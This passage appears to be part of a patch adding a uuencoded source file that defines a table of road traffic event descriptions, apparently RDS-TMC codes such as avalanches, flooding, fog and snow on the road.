+M9FQA<V@@9FQO;V1S(CL*("`@("1%=F5N=%LY,3%=("`](")A=F%L86YC:&5S
+M(CL*("`@("1%=F5N=%LY,3)=("`](")A=F%L86YC:&4@<FES:R(["B`@("`D
+M179E;G1;.3$S72`@/2`B<F]C:V9A;&QS(CL*("`@("1%=F5N=%LY,31=("`]
+M(")L86YD<VQI<',B.PH@("`@)$5V96YT6SDQ-5T@(#T@(F5A<G1H<75A:V4@
+M9&%M86=E(CL*("`@("1%=F5N=%LY,39=("`](")R;V%D('-U<F9A8V4@:6X@
+M<&]O<B!C;VYD:71I;VXB.PH@("`@)$5V96YT6SDQ-UT@(#T@(G-U8G-I9&5N
+M8V4B.PH@("`@)$5V96YT6SDQ.%T@(#T@(BA1*2!C;VQL87!S960@<V5W97(H
+M<RDB.PH@("`@)$5V96YT6SDQ.5T@(#T@(F)U<G-T('=A=&5R(&UA:6XB.PH@
+M("`@)$5V96YT6SDR,%T@(#T@(F=A<R!L96%K(CL*("`@("1%=F5N=%LY,C%=
+M("`](")S97)I;W5S(&9I<F4B.PH@("`@)$5V96YT6SDR,ET@(#T@(F%N:6UA
+M;',@;VX@<F]A9'=A>2(["B`@("`D179E;G1;.3(S72`@/2`B86YI;6%L<R!O
+M;B!T:&4@<F]A9"X@1&%N9V5R(CL*("`@("1%=F5N=%LY,C1=("`](")C;&5A
+M<F%N8V4@=V]R:R(["B`@("`D179E;G1;.3(U72`@/2`B8FQO8VME9"!B>2!S
+M=&]R;2!D86UA9V4B.PH@("`@)$5V96YT6SDR-ET@(#T@(F)L;V-K960@8GD@
+M*%$I(&9A;&QE;B!T<F5E<R(["B`@("`D179E;G1;.3(W72`@/2`B*%$I(&9A
+M;&QE;B!T<F5E*',I+B!087-S86)L92!W:71H(&-A<F4B.PH@("`@)$5V96YT
+M6SDR.%T@(#T@(F9L;V]D:6YG+B!3=&%T:6]N87)Y('1R869F:6,B.PH@("`@
+M)$5V96YT6SDR.5T@(#T@(F9L;V]D:6YG+B!$86YG97(@;V8@<W1A=&EO;F%R
+M>2!T<F%F9FEC(CL*("`@("1%=F5N=%LY,S!=("`](")F;&]O9&EN9RX@475E
+M=6EN9R!T<F%F9FEC(CL*("`@("1%=F5N=%LY,S%=("`](")F;&]O9&EN9RX@
+M1&%N9V5R(&]F('%U975I;F<@=')A9F9I8R(["B`@("`D179E;G1;.3,R72`@
+M/2`B9FQO;V1I;F<N(%-L;W<@=')A9F9I8R(["B`@("`D179E;G1;.3,S72`@
+M/2`B9FQO;V1I;F<N(%-L;W<@=')A9F9I8R!E>'!E8W1E9"(["B`@("`D179E
+M;G1;.3,T72`@/2`B9FQO;V1I;F<N($AE879Y('1R869F:6,B.PH@("`@)$5V
+M96YT6SDS-5T@(#T@(F9L;V]D:6YG+B!(96%V>2!T<F%F9FEC(&5X<&5C=&5D
+M(CL*("`@("1%=F5N=%LY,S9=("`](")F;&]O9&EN9RX@5')A9F9I8R!F;&]W
+M:6YG(&9R965L>2(["B`@("`D179E;G1;.3,W72`@/2`B9FQO;V1I;F<N(%1R
+M869F:6,@8G5I;&1I;F<@=7`B.PH@("`@)$5V96YT6SDS.%T@(#T@(F-L;W-E
+M9"!D=64@=&\@9FQO;V1I;F<B.PH@("`@)$5V96YT6SDS.5T@(#T@(F9L;V]D
+M:6YG+B!$96QA>7,@*%$I(CL*("`@("1%=F5N=%LY-#!=("`](")F;&]O9&EN
+M9RX@1&5L87ES("A1*2!E>'!E8W1E9"(["B`@("`D179E;G1;.30Q72`@/2`B
+M9FQO;V1I;F<N($QO;F<@9&5L87ES("A1*2(["B`@("`D179E;G1;.30R72`@
+M/2`B9FQO;V1I;F<N(%!A<W-A8FQE('=I=&@@8V%R92(["B`@("`D179E;G1;
+M.30S72`@/2`B8VQO<V5D(&1U92!T;R!A=F%L86YC:&5S(CL*("`@("1%=F5N
+M=%LY-#1=("`](")A=F%L86YC:&5S+B!087-S86)L92!W:71H(&-A<F4@*&%B
+M;W9E(%$@:'5N9')E9"!M971R97,I(CL*("`@("1%=F5N=%LY-#5=("`](")C
+M;&]S960@9'5E('1O(')O8VMF86QL<R(["B`@("`D179E;G1;.30V72`@/2`B
+M<F]C:V9A;&QS+B!087-S86)L92!W:71H(&-A<F4B.PH@("`@)$5V96YT6SDT
+M-UT@(#T@(G)O860@8VQO<V5D(&1U92!T;R!L86YD<VQI<',B.PH@("`@)$5V
+M96YT6SDT.%T@(#T@(FQA;F1S;&EP<RX@4&%S<V%B;&4@=VET:"!C87)E(CL*
+M("`@("1%=F5N=%LY-#E=("`](")C;&]S960@9'5E('1O('-U8G-I9&5N8V4B
+M.PH@("`@)$5V96YT6SDU,%T@(#T@(G-U8G-I9&5N8V4N(%-I;F=L92!A;'1E
+M<FYA=&4@;&EN92!T<F%F9FEC(CL*("`@("1%=F5N=%LY-3%=("`](")S=6)S
+M:61E;F-E+B!#87)R:6%G97=A>2!R961U8V5D("AF<F]M(%$@;&%N97,I('1O
+M(&]N92!L86YE(CL*("`@("1%=F5N=%LY-3)=("`](")S=6)S:61E;F-E+B!#
+M87)R:6%G97=A>2!R961U8V5D("AF<F]M(%$@;&%N97,I('1O('1W;R!L86YE
+M<R(["B`@("`D179E;G1;.34S72`@/2`B<W5B<VED96YC92X@0V%R<FEA9V5W
+M87D@<F5D=6-E9"`H9G)O;2!1(&QA;F5S*2!T;R!T:')E92!L86YE<R(["B`@
+M("`D179E;G1;.34T72`@/2`B<W5B<VED96YC92X@0V]N=')A9FQO=R!I;B!O
+M<&5R871I;VXB.PH@("`@)$5V96YT6SDU-5T@(#T@(G-U8G-I9&5N8V4N(%!A
+M<W-A8FQE('=I=&@@8V%R92(["B`@("`D179E;G1;.34V72`@/2`B8VQO<V5D
+M(&1U92!T;R!S97=E<B!C;VQL87!S92(["B`@("`D179E;G1;.34W72`@/2`B
+M<F]A9"!C;&]S960@9'5E('1O(&)U<G-T('=A=&5R(&UA:6XB.PH@("`@)$5V
+M96YT6SDU.%T@(#T@(F)U<G-T('=A=&5R(&UA:6XN($1E;&%Y<R`H42DB.PH@
+M("`@)$5V96YT6SDU.5T@(#T@(F)U<G-T('=A=&5R(&UA:6XN($1E;&%Y<R`H
+M42D@97AP96-T960B.PH@("`@)$5V96YT6SDV,%T@(#T@(F)U<G-T('=A=&5R
+M(&UA:6XN($QO;F<@9&5L87ES("A1*2(["B`@("`D179E;G1;.38Q72`@/2`B
+M8VQO<V5D(&1U92!T;R!G87,@;&5A:R(["B`@("`D179E;G1;.38R72`@/2`B
+M9V%S(&QE86LN($1E;&%Y<R`H42DB.PH@("`@)$5V96YT6SDV,UT@(#T@(F=A
+M<R!L96%K+B!$96QA>7,@*%$I(&5X<&5C=&5D(CL*("`@("1%=F5N=%LY-C1=
+M("`](")G87,@;&5A:RX@3&]N9R!D96QA>7,@*%$I(CL*("`@("1%=F5N=%LY
+M-C5=("`](")C;&]S960@9'5E('1O('-E<FEO=7,@9FER92(["B`@("`D179E
+M;G1;.38V72`@/2`B<V5R:6]U<R!F:7)E+B!$96QA>7,@*%$I(CL*("`@("1%
+M=F5N=%LY-C==("`](")S97)I;W5S(&9I<F4N($1E;&%Y<R`H42D@97AP96-T
+M960B.PH@("`@)$5V96YT6SDV.%T@(#T@(G-E<FEO=7,@9FER92X@3&]N9R!D
+M96QA>7,@*%$I(CL*("`@("1%=F5N=%LY-CE=("`](")C;&]S960@9F]R(&-L
+M96%R86YC92!W;W)K(CL*("`@("1%=F5N=%LY-S!=("`](")R;V%D(&9R964@
+M86=A:6XB.PH@("`@)$5V96YT6SDW,5T@(#T@(FUE<W-A9V4@8V%N8V5L;&5D
+M(CL*("`@("1%=F5N=%LY-S)=("`](")S=&]R;2!D86UA9V4@97AP96-T960B
+M.PH@("`@)$5V96YT6SDW,UT@(#T@(F9A;&QE;B!P;W=E<B!C86)L97,B.PH@
+M("`@)$5V96YT6SDW-%T@(#T@(G-E=V5R(&]V97)F;&]W(CL*("`@("1%=F5N
+M=%LY-S5=("`](")I8V4@8G5I;&0M=7`B.PH@("`@)$5V96YT6SDW-ET@(#T@
+M(FUU9"!S;&ED92(["B`@("`D179E;G1;.3<W72`@/2`B9W)A<W,@9FER92([
+M"B`@("`D179E;G1;.3<X72`@/2`B86ER(&-R87-H(CL*("`@("1%=F5N=%LY
+M-SE=("`](")R86EL(&-R87-H(CL*("`@("1%=F5N=%LY.#!=("`](")B;&]C
+M:V5D(&)Y("A1*2!O8G-T<G5C=&EO;BAS*2!O;B!T:&4@<F]A9"(["B`@("`D
+M179E;G1;.3@Q72`@/2`B*%$I(&]B<W1R=6-T:6]N<R!O;B!T:&4@<F]A9"X@
+M4&%S<V%B;&4@=VET:"!C87)E(CL*("`@("1%=F5N=%LY.#)=("`](")B;&]C
+M:V5D(&1U92!T;R!S<&EL;&%G92!O;B!R;V%D=V%Y(CL*("`@("1%=F5N=%LY
+M.#-=("`](")S<&EL;&%G92!O;B!T:&4@<F]A9"X@4&%S<V%B;&4@=VET:"!C
+M87)E(CL*("`@("1%=F5N=%LY.#1=("`](")S<&EL;&%G92!O;B!T:&4@<F]A
+M9"X@1&%N9V5R(CL*("`@("1%=F5N=%LY.#5=("`](")S=&]R;2!D86UA9V4N
+M(%!A<W-A8FQE('=I=&@@8V%R92(["B`@("`D179E;G1;.3@V72`@/2`B<W1O
+M<FT@9&%M86=E+B!$86YG97(B.PH@("`@)$5V96YT6SDX-UT@(#T@(F)L;V-K
+M960@8GD@9F%L;&5N('!O=V5R(&-A8FQE<R(["B`@("`D179E;G1;.3@X72`@
+M/2`B9F%L;&5N('!O=V5R(&-A8FQE<RX@4&%S<V%B;&4@=VET:"!C87)E(CL*
+M("`@("1%=F5N=%LY.#E=("`](")F86QL96X@<&]W97(@8V%B;&5S+B!$86YG
+M97(B.PH@("`@)$5V96YT6SDY,%T@(#T@(G-E=V5R(&]V97)F;&]W+B!$86YG
+M97(B.PH@("`@)$5V96YT6SDY,5T@(#T@(F9L87-H(&9L;V]D<RX@1&%N9V5R
+M(CL*("`@("1%=F5N=%LY.3)=("`](")A=F%L86YC:&5S+B!$86YG97(B.PH@
+M("`@)$5V96YT6SDY,UT@(#T@(F-L;W-E9"!D=64@=&\@879A;&%N8VAE(')I
+M<VLB.PH@("`@)$5V96YT6SDY-%T@(#T@(F%V86QA;F-H92!R:7-K+B!$86YG
+M97(B.PH@("`@)$5V96YT6SDY-5T@(#T@(F-L;W-E9"!D=64@=&\@:6-E(&)U
+M:6QD+75P(CL*("`@("1%=F5N=%LY.39=("`](")I8V4@8G5I;&0M=7`N(%!A
+M<W-A8FQE('=I=&@@8V%R92`H86)O=F4@42!H=6YD<F5D(&UE=')E<RDB.PH@
+M("`@)$5V96YT6SDY-UT@(#T@(FEC92!B=6EL9"UU<"X@4VEN9VQE(&%L=&5R
+M;F%T92!T<F%F9FEC(CL*("`@("1%=F5N=%LY.3A=("`](")R;V-K9F%L;',N
+M($1A;F=E<B(["B`@("`D179E;G1;.3DY72`@/2`B;&%N9'-L:7!S+B!$86YG
+M97(B.PH@("`@)$5V96YT6S$P,#!=(#T@(F5A<G1H<75A:V4@9&%M86=E+B!$
+M86YG97(B.PH@("`@)$5V96YT6S$P,#%=(#T@(FAA>F%R9&]U<R!D<FEV:6YG
+M(&-O;F1I=&EO;G,@*&%B;W9E(%$@:'5N9')E9"!M971R97,I(CL*("`@("1%
+M=F5N=%LQ,#`R72`](")D86YG97(@;V8@87%U87!L86YI;F<B.PH@("`@)$5V
+M96YT6S$P,#-=(#T@(G-L:7!P97)Y(')O860@*&%B;W9E(%$@:'5N9')E9"!M
+M971R97,I(CL*("`@("1%=F5N=%LQ,#`T72`](")M=60@;VX@<F]A9"(["B`@
+M("`D179E;G1;,3`P-5T@/2`B;&5A=F5S(&]N(')O860B.PH@("`@)$5V96YT
+M6S$P,#9=(#T@(FEC92`H86)O=F4@42!H=6YD<F5D(&UE=')E<RDB.PH@("`@
+M)$5V96YT6S$P,#==(#T@(F1A;F=E<B!O9B!I8V4@*&%B;W9E(%$@:'5N9')E
+M9"!M971R97,I(CL*("`@("1%=F5N=%LQ,#`X72`](")B;&%C:R!I8V4@*&%B
+M;W9E(%$@:'5N9')E9"!M971R97,I(CL*("`@("1%=F5N=%LQ,#`Y72`](")F
+M<F5E>FEN9R!R86EN("AA8F]V92!1(&AU;F1R960@;65T<F5S*2(["B`@("`D
+M179E;G1;,3`Q,%T@/2`B=V5T(&%N9"!I8WD@<F]A9',@*&%B;W9E(%$@:'5N
+M9')E9"!M971R97,I(CL*("`@("1%=F5N=%LQ,#$Q72`](")S;'5S:"`H86)O
+M=F4@42!H=6YD<F5D(&UE=')E<RDB.PH@("`@)$5V96YT6S$P,3)=(#T@(G-N
+M;W<@;VX@=&AE(')O860@*&%B;W9E(%$@:'5N9')E9"!M971R97,I(CL*("`@
+M("1%=F5N=%LQ,#$S72`](")P86-K960@<VYO=R`H86)O=F4@42!H=6YD<F5D
+M(&UE=')E<RDB.PH@("`@)$5V96YT6S$P,31=(#T@(F9R97-H('-N;W<@*&%B
+M;W9E(%$@:'5N9')E9"!M971R97,I(CL*("`@("1%=F5N=%LQ,#$U72`](")D
+M965P('-N;W<@*&%B;W9E(%$@:'5N9')E9"!M971R97,I(CL*("`@("1%=F5N
+M=%LQ,#$V72`](")S;F]W(&1R:69T<R`H86)O=F4@42!H=6YD<F5D(&UE=')E
+M<RDB.PH@("`@)$5V96YT6S$P,3==(#T@(G-L:7!P97)Y(&1U92!T;R!S<&EL
+M;&%G92!O;B!R;V%D=V%Y(CL*("`@("1%=F5N=%LQ,#$X72`](")S;&EP<&5R
+M>2!R;V%D("AA8F]V92!1(&AU;F1R960@;65T<F5S*2!D=64@=&\@<VYO=R([
+M"B`@("`D179E;G1;,3`Q.5T@/2`B<VQI<'!E<GD@<F]A9"`H86)O=F4@42!H
+M=6YD<F5D(&UE=')E<RD@9'5E('1O(&9R;W-T(CL*("`@("1%=F5N=%LQ,#(P
+M72`](")R;V%D(&)L;V-K960@8GD@<VYO=R`H86)O=F4@42!H=6YD<F5D(&UE
+M=')E<RDB.PH@("`@)$5V96YT6S$P,C%=(#T@(G-N;W<@;VX@=&AE(')O860N
+M($-A<G)I86=E=V%Y(')E9'5C960@*&9R;VT@42!L86YE<RD@=&\@;VYE(&QA
+M;F4B.PH@("`@)$5V96YT6S$P,C)=(#T@(G-N;W<@;VX@=&AE(')O860N($-A
+M<G)I86=E=V%Y(')E9'5C960@*&9R;VT@42!L86YE<RD@=&\@='=O(&QA;F5S
+M(CL*("`@("1%=F5N=%LQ,#(S72`](")S;F]W(&]N('1H92!R;V%D+B!#87)R
+M:6%G97=A>2!R961U8V5D("AF<F]M(%$@;&%N97,I('1O('1H<F5E(&QA;F5S
+M(CL*("`@("1%=F5N=%LQ,#(T72`](")C;VYD:71I;VYS(&]F(')O860@<W5R
+M9F%C92!I;7!R;W9E9"(["B`@("`D179E;G1;,3`R-5T@/2`B;65S<V%G92!C
+M86YC96QL960B.PH@("`@)$5V96YT6S$P,C9=(#T@(G-U8G-I9&5N8V4N($1A
+M;F=E<B(["B`@("`D179E;G1;,3`R-UT@/2`B<V5W97(@8V]L;&%P<V4N($1E
+M;&%Y<R`H42DB.PH@("`@)$5V96YT6S$P,CA=(#T@(G-E=V5R(&-O;&QA<'-E
+M+B!$96QA>7,@*%$I(&5X<&5C=&5D(CL*("`@("1%=F5N=%LQ,#(Y72`](")S
+M97=E<B!C;VQL87!S92X@3&]N9R!D96QA>7,@*%$I(CL*("`@("1%=F5N=%LQ
+M,#,P72`](")S97=E<B!C;VQL87!S92X@1&%N9V5R(CL*("`@("1%=F5N=%LQ
+M,#,Q72`](")B=7)S="!W871E<B!M86EN+B!$86YG97(B.PH@("`@)$5V96YT
+M6S$P,S)=(#T@(F=A<R!L96%K+B!$86YG97(B.PH@("`@)$5V96YT6S$P,S-=
+M(#T@(G-E<FEO=7,@9FER92X@1&%N9V5R(CL*("`@("1%=F5N=%LQ,#,T72`]
+M(")C;&5A<F%N8V4@=V]R:RX@1&%N9V5R(CL*("`@("1%=F5N=%LQ,#,U72`]
+M(")I;7!A<W-A8FQE("AA8F]V92!1(&AU;F1R960@;65T<F5S*2(["B`@("`D
+M179E;G1;,3`S-ET@/2`B86QM;W-T(&EM<&%S<V%B;&4@*&%B;W9E(%$@:'5N
+M9')E9"!M971R97,I(CL*("`@("1%=F5N=%LQ,#,W72`](")E>'1R96UE;'D@
+M:&%Z87)D;W5S(&1R:79I;F<@8V]N9&ET:6]N<R`H86)O=F4@42!H=6YD<F5D
+M(&UE=')E<RDB.PH@("`@)$5V96YT6S$P,SA=(#T@(F1I9F9I8W5L="!D<FEV
+M:6YG(&-O;F1I=&EO;G,@*&%B;W9E(%$@:'5N9')E9"!M971R97,I(CL*("`@
+M("1%=F5N=%LQ,#,Y72`](")P87-S86)L92!W:71H(&-A<F4@*'5P('1O(%$@
+M:'5N9')E9"!M971R97,I(CL*("`@("1%=F5N=%LQ,#0P72`](")P87-S86)L
+M92`H=7`@=&\@42!H=6YD<F5D(&UE=')E<RDB.PH@("`@)$5V96YT6S$P-#%=
+M(#T@(G-U<F9A8V4@=V%T97(@:&%Z87)D(CL*("`@("1%=F5N=%LQ,#0R72`]
+M(")L;V]S92!S86YD(&]N(')O860B.PH@("`@)$5V96YT6S$P-#-=(#T@(FQO
+M;W-E(&-H:7!P:6YG<R(["B`@("`D179E;G1;,3`T-%T@/2`B;VEL(&]N(')O
+M860B.PH@("`@)$5V96YT6S$P-#5=(#T@(G!E=')O;"!O;B!R;V%D(CL*("`@
+M("1%=F5N=%LQ,#0W72`](")I8WD@<&%T8VAE<R`H86)O=F4@42!H=6YD<F5D
+M(&UE=')E<RDB.PH@("`@)$5V96YT6S$P-#A=(#T@(F1A;F=E<B!O9B!I8WD@
+M<&%T8VAE<R`H86)O=F4@42!H=6YD<F5D(&UE=')E<RDB.PH@("`@)$5V96YT
+M6S$P-3!=(#T@(F1A;F=E<B!O9B!B;&%C:R!I8V4@*&%B;W9E(%$@:'5N9')E
+M9"!M971R97,I(CL*("`@("1%=F5N=%LQ,#4T72`](")S;&EP<&5R>2!D=64@
+M=&\@;&]O<V4@<V%N9"!O;B!R;V%D=V%Y(CL*("`@("1%=F5N=%LQ,#4U72`]
+M(")M=60@;VX@<F]A9"X@1&%N9V5R(CL*("`@("1%=F5N=%LQ,#4V72`](")L
+M;V]S92!C:&EP<&EN9W,N($1A;F=E<B(["B`@("`D179E;G1;,3`U-UT@/2`B
+M;VEL(&]N(')O860N($1A;F=E<B(["B`@("`D179E;G1;,3`U.%T@/2`B<&5T
+M<F]L(&]N(')O860N($1A;F=E<B(["B`@("`D179E;G1;,3`U.5T@/2`B<F]A
+M9"!S=7)F86-E(&EN('!O;W(@8V]N9&ET:6]N+B!$86YG97(B.PH@("`@)$5V
+M96YT6S$P-C!=(#T@(FEC>2!P871C:&5S("AA8F]V92!1(&AU;F1R960@;65T
+M<F5S*2!O;B!B<FED9V5S(CL*("`@("1%=F5N=%LQ,#8Q72`](")D86YG97(@
+M;V8@:6-Y('!A=&-H97,@*&%B;W9E(%$@:'5N9')E9"!M971R97,I(&]N(&)R
+M:61G97,B.PH@("`@)$5V96YT6S$P-C)=(#T@(FEC>2!P871C:&5S("AA8F]V
+M92!1(&AU;F1R960@;65T<F5S*2!O;B!B<FED9V5S+"!I;B!S:&%D960@87)E
+M87,@86YD(&]N(',B.PH@("`@)$5V96YT6S$P-C-=(#T@(FEM<&%S<V%B;&4@
+M9F]R(&AE879Y('9E:&EC;&5S("AO=F5R(%$I(CL*("`@("1%=F5N=%LQ,#8T
+M72`](")I;7!A<W-A8FQE("AA8F]V92!1(&AU;F1R960@;65T<F5S*2!F;W(@
+M=F5H:6-L97,@=VET:"!T<F%I;&5R<R(["B`@("`D179E;G1;,3`V-5T@/2`B
+M9')I=FEN9R!C;VYD:71I;VYS(&EM<')O=F5D(CL*("`@("1%=F5N=%LQ,#8V
+M72`](")R97-C=64@86YD(')E8V]V97)Y('=O<FL@:6X@<')O9W)E<W,N($1A
+M;F=E<B(["B`@("`D179E;G1;,3`V-UT@/2`B;&%R9V4@86YI;6%L<R!O;B!R
+M;V%D=V%Y(CL*("`@("1%=F5N=%LQ,#8X72`](")H97)D<R!O9B!A;FEM86QS
+M(&]N(')O861W87DB.PH@("`@)$5V96YT6S$P-CE=(#T@(G-K:60@:&%Z87)D
+M(')E9'5C960B.PH@("`@)$5V96YT6S$P-S!=(#T@(G-N;W<@8VQE87)E9"([
+M"B`@("`D179E;G1;,3`W,UT@/2`B97AT<F5M96QY(&AA>F%R9&]U<R!D<FEV
+M:6YG(&-O;F1I=&EO;G,@97AP96-T960@*&%B;W9E(%$@:'5N9')E9"!M971E
+M<G,B.PH@("`@)$5V96YT6S$P-S1=(#T@(F9R965Z:6YG(')A:6X@97AP96-T
+M960@*&%B;W9E(%$@:'5N9')E9"!M971R97,I(CL*("`@("1%=F5N=%LQ,#<U
+M72`](")D86YG97(@;V8@<F]A9"!B96EN9R!B;&]C:V5D(&)Y('-N;W<@*&%B
+M;W9E(%$@:'5N9')E9"!M971R97,I(CL*("`@("1%=F5N=%LQ,#<Y72`](")T
+M96UP97)A='5R92!F86QL:6YG(')A<&ED;'D@*'1O(%$I(CL*("`@("1%=F5N
+M=%LQ,#@P72`](")E>'1R96UE(&AE870@*'5P('1O(%$I(CL*("`@("1%=F5N
+M=%LQ,#@Q72`](")E>'1R96UE(&-O;&0@*&]F(%$I(CL*("`@("1%=F5N=%LQ
+M,#@R72`](")L97-S(&5X=')E;64@=&5M<&5R871U<F5S(CL*("`@("1%=F5N
+M=%LQ,#@S72`](")C=7)R96YT('1E;7!E<F%T=7)E("A1*2(["B`@("`D179E
+M;G1;,3$P,5T@/2`B:&5A=GD@<VYO=V9A;&P@*%$I(CL*("`@("1%=F5N=%LQ
+M,3`R72`](")H96%V>2!S;F]W9F%L;"`H42DN(%9I<VEB:6QI='D@<F5D=6-E
+M9"!T;R`\;2(["B`@("`D179E;G1;,3$P,UT@/2`B:&5A=GD@<VYO=V9A;&P@
+M*%$I+B!6:7-I8FEL:71Y(')E9'5C960@=&\@/&TB.PH@("`@)$5V96YT6S$Q
+M,#1=(#T@(G-N;W=F86QL("A1*2(["B`@("`D179E;G1;,3$P-5T@/2`B<VYO
+M=V9A;&P@*%$I+B!6:7-I8FEL:71Y(')E9'5C960@=&\@/&TB.PH@("`@)$5V
+M96YT6S$Q,#9=(#T@(FAA:6P@*'9I<VEB:6QI='D@<F5D=6-E9"!T;R!1*2([
+M"B`@("`D179E;G1;,3$P-UT@/2`B<VQE970@*'9I<VEB:6QI='D@<F5D=6-E
+M9"!T;R!1*2(["B`@("`D179E;G1;,3$P.%T@/2`B=&AU;F1E<G-T;W)M<R`H
+M=FES:6)I;&ET>2!R961U8V5D('1O(%$I(CL*("`@("1%=F5N=%LQ,3`Y72`]
+M(")H96%V>2!R86EN("A1*2(["B`@("`D179E;G1;,3$Q,%T@/2`B:&5A=GD@
+M<F%I;B`H42DN(%9I<VEB:6QI='D@<F5D=6-E9"!T;R`\;2(["B`@("`D179E
+M;G1;,3$Q,5T@/2`B:&5A=GD@<F%I;B`H42DN(%9I<VEB:6QI='D@<F5D=6-E
+M9"!T;R`\;2(["B`@("`D179E;G1;,3$Q,ET@/2`B<F%I;B`H42DB.PH@("`@
+M)$5V96YT6S$Q,3-=(#T@(G)A:6X@*%$I+B!6:7-I8FEL:71Y(')E9'5C960@
+M=&\@/&TB.PH@("`@)$5V96YT6S$Q,31=(#T@(G-H;W=E<G,@*'9I<VEB:6QI
+M='D@<F5D=6-E9"!T;R!1*2(["B`@("`D179E;G1;,3$Q-5T@/2`B:&5A=GD@
+M9G)O<W0B.PH@("`@)$5V96YT6S$Q,39=(#T@(F9R;W-T(CL*("`@("1%=F5N
+M=%LQ,3(V72`](")W96%T:&5R('-I='5A=&EO;B!I;7!R;W9E9"(["B`@("`D
+M179E;G1;,3$R-UT@/2`B;65S<V%G92!C86YC96QL960B.PH@("`@)$5V96YT
+M6S$Q,CA=(#T@(G=I;G1E<B!S=&]R;2`H=FES:6)I;&ET>2!R961U8V5D('1O
+M(%$I(CL*("`@("1%=F5N=%LQ,3,P72`](")B;&EZ>F%R9"`H=FES:6)I;&ET
+M>2!R961U8V5D('1O(%$I(CL*("`@("1%=F5N=%LQ,3,R72`](")D86UA9VEN
+M9R!H86EL("AV:7-I8FEL:71Y(')E9'5C960@=&\@42DB.PH@("`@)$5V96YT
+M6S$Q,S1=(#T@(FAE879Y('-N;W=F86QL+B!6:7-I8FEL:71Y(')E9'5C960@
+M*'1O(%$I(CL*("`@("1%=F5N=%LQ,3,U72`](")S;F]W9F%L;"X@5FES:6)I
+M;&ET>2!R961U8V5D("AT;R!1*2(["B`@("`D179E;G1;,3$S-ET@/2`B:&5A
+M=GD@<F%I;BX@5FES:6)I;&ET>2!R961U8V5D("AT;R!1*2(["B`@("`D179E
+M;G1;,3$S-UT@/2`B<F%I;BX@5FES:6)I;&ET>2!R961U8V5D("AT;R!1*2([
+M"B`@("`D179E;G1;,3$W,%T@/2`B:&5A=GD@<VYO=V9A;&P@*%$I(&5X<&5C
+M=&5D(CL*("`@("1%=F5N=%LQ,3<Q72`](")H96%V>2!R86EN("A1*2!E>'!E
+M8W1E9"(["B`@("`D179E;G1;,3$W,ET@/2`B=V5A=&AE<B!E>'!E8W1E9"!T
+M;R!I;7!R;W9E(CL*("`@("1%=F5N=%LQ,3<S72`](")B;&EZ>F%R9"`H=VET
+M:"!V:7-I8FEL:71Y(')E9'5C960@=&\@42D@97AP96-T960B.PH@("`@)$5V
+M96YT6S$Q-S1=(#T@(F1A;6%G:6YG(&AA:6P@*'=I=&@@=FES:6)I;&ET>2!R
+M961U8V5D('1O(%$I(&5X<&5C=&5D(CL*("`@("1%=F5N=%LQ,3<U72`](")R
+M961U8V5D('9I<VEB:6QI='D@*'1O(%$I(&5X<&5C=&5D(CL*("`@("1%=F5N
+M=%LQ,3<V72`](")F<F5E>FEN9R!F;V<@97AP96-T960@*'=I=&@@=FES:6)I
+M;&ET>2!R961U8V5D('1O(%$I+B!$86YG97(@;V8@<VQI<'!E<GD@<F]A9',B
+M.PH@("`@)$5V96YT6S$Q-S==(#T@(F1E;G-E(&9O9R`H=VET:"!V:7-I8FEL
+M:71Y(')E9'5C960@=&\@42D@97AP96-T960B.PH@("`@)$5V96YT6S$Q-SA=
+M(#T@(G!A=&-H>2!F;V<@*'=I=&@@=FES:6)I;&ET>2!R961U8V5D('1O(%$I
+M(&5X<&5C=&5D(CL*("`@("1%=F5N=%LQ,3<Y72`](")V:7-I8FEL:71Y(&5X
+M<&5C=&5D('1O(&EM<')O=F4B.PH@("`@)$5V96YT6S$Q.#!=(#T@(F%D=F5R
+M<V4@=V5A=&AE<B!W87)N:6YG('=I=&AD<F%W;B(["B`@("`D179E;G1;,3$Y
+M,%T@/2`B<V5V97)E('-M;V<B.PH@("`@)$5V96YT6S$Q.3%=(#T@(G-E=F5R
+M92!E>&AA=7-T('!O;&QU=&EO;B(["B`@("`D179E;G1;,3(P,5T@/2`B=&]R
+M;F%D;V5S(CL*("`@("1%=F5N=%LQ,C`R72`](")H=7)R:6-A;F4@9F]R8V4@
+M=VEN9',@*%$I(CL*("`@("1%=F5N=%LQ,C`S72`](")G86QE<R`H42DB.PH@
+M("`@)$5V96YT6S$R,#1=(#T@(G-T;W)M(&9O<F-E('=I;F1S("A1*2(["B`@
+M("`D179E;G1;,3(P-5T@/2`B<W1R;VYG('=I;F1S("A1*2(["B`@("`D179E
+M;G1;,3(P.5T@/2`B9W5S='D@=VEN9',@*%$I(CL*("`@("1%=F5N=%LQ,C$P
+M72`](")C<F]S<W=I;F1S("A1*2(["B`@("`D179E;G1;,3(Q,5T@/2`B<W1R
+M;VYG('=I;F1S("A1*2!A9F9E8W1I;F<@:&EG:"US:61E9"!V96AI8VQE<R([
+M"B`@("`D179E;G1;,3(Q,ET@/2`B8VQO<V5D(&9O<B!H:6=H+7-I9&5D('9E
+M:&EC;&5S(&1U92!T;R!S=')O;F<@=VEN9',@*%$I(CL*("`@("1%=F5N=%LQ
+M,C$S72`](")S=')O;F<@=VEN9',@96%S:6YG(CL*("`@("1%=F5N=%LQ,C$T
+M72`](")M97-S86=E(&-A;F-E;&QE9"(["B`@("`D179E;G1;,3(Q-5T@/2`B
+M<F5S=')I8W1I;VYS(&9O<B!H:6=H+7-I9&5D('9E:&EC;&5S(&QI9G1E9"([
+M"B`@("`D179E;G1;,3(Q-UT@/2`B=&]R;F%D;R!W87)N:6YG(&5N9&5D(CL*
+M("`@("1%=F5N=%LQ,S`Q72`](")D96YS92!F;V<@*'9I<VEB:6QI='D@<F5D
+M=6-E9"!T;R!1*2(["B`@("`D179E;G1;,3,P,ET@/2`B9&5N<V4@9F]G+B!6
+M:7-I8FEL:71Y(')E9'5C960@=&\@/&TB.PH@("`@)$5V96YT6S$S,#-=(#T@
+M(F1E;G-E(&9O9RX@5FES:6)I;&ET>2!R961U8V5D('1O(#QM(CL*("`@("1%
+M=F5N=%LQ,S`T72`](")F;V<@*'9I<VEB:6QI='D@<F5D=6-E9"!T;R!1*2([
+M"B`@("`D179E;G1;,3,P-5T@/2`B9F]G+B!6:7-I8FEL:71Y(')E9'5C960@
+M=&\@/&TB.PH@("`@)$5V96YT6S$S,#==(#T@(G!A=&-H>2!F;V<@*'9I<VEB
+M:6QI='D@<F5D=6-E9"!T;R!1*2(["B`@("`D179E;G1;,3,P.%T@/2`B9G)E
+M97II;F<@9F]G("AV:7-I8FEL:71Y(')E9'5C960@=&\@42DB.PH@("`@)$5V
